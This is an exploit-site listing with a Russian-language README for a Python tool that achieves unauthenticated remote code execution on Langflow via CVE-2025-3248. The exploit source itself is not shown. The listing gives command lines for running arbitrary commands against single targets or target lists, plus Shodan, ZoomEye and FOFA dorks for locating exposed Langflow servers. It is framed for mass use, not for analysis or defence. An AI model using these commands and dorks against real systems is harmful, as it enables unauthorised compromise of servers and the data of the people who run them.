Sploitus

Exploit for CVE-2025-3248

kitploit · 2026-08-27

Exploit Code

MARKDOWN54 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-ZAPSTIKO-CVE-2025-3248
# CVE-2025-3248 — Эксплойт RCE для Langflow

Эксплойт удаленного выполнения кода (RCE) для приложений **Langflow** , уязвимых к **CVE-2025-3248**.

  * **Уязвимая конечная точка:** `/api/v1/validate/code`



* * *

## 🚀 Возможности эксплойта

  * 🔓 Удаленный RCE без аутентификации
  * 🔐 Аутентификация не требуется
  * 🐍 Односценарный скрипт на Python3
  * 🎨 Цветной вывод в терминал для наглядности



* * *

## 🔧 Использование

root@kitploit:~
    
    
    python3 langflow_rce.py -u http://target:7860 -c "id"
    python3 langflow_rce.py -i target.txt -c "id"
    python3 langflow_rce.py -i target.txt -c "id" -p http://127.0.0.1:8080
    

## Dork

root@kitploit:~
    
    
    Shodan: 
    
    http.title:"Langflow" "Langflow allows you to build LLM applications"
    
    title:"Langflow"
    
    ZoomEye: 
    
    title:"Langflow" && body:"Langflow allows you to build LLM applications"
    
    app:"Langflow"
    
    FOFA: 
    
    title="Langflow" && body="Langflow allows you to build LLM applications"
    
    app="Langflow"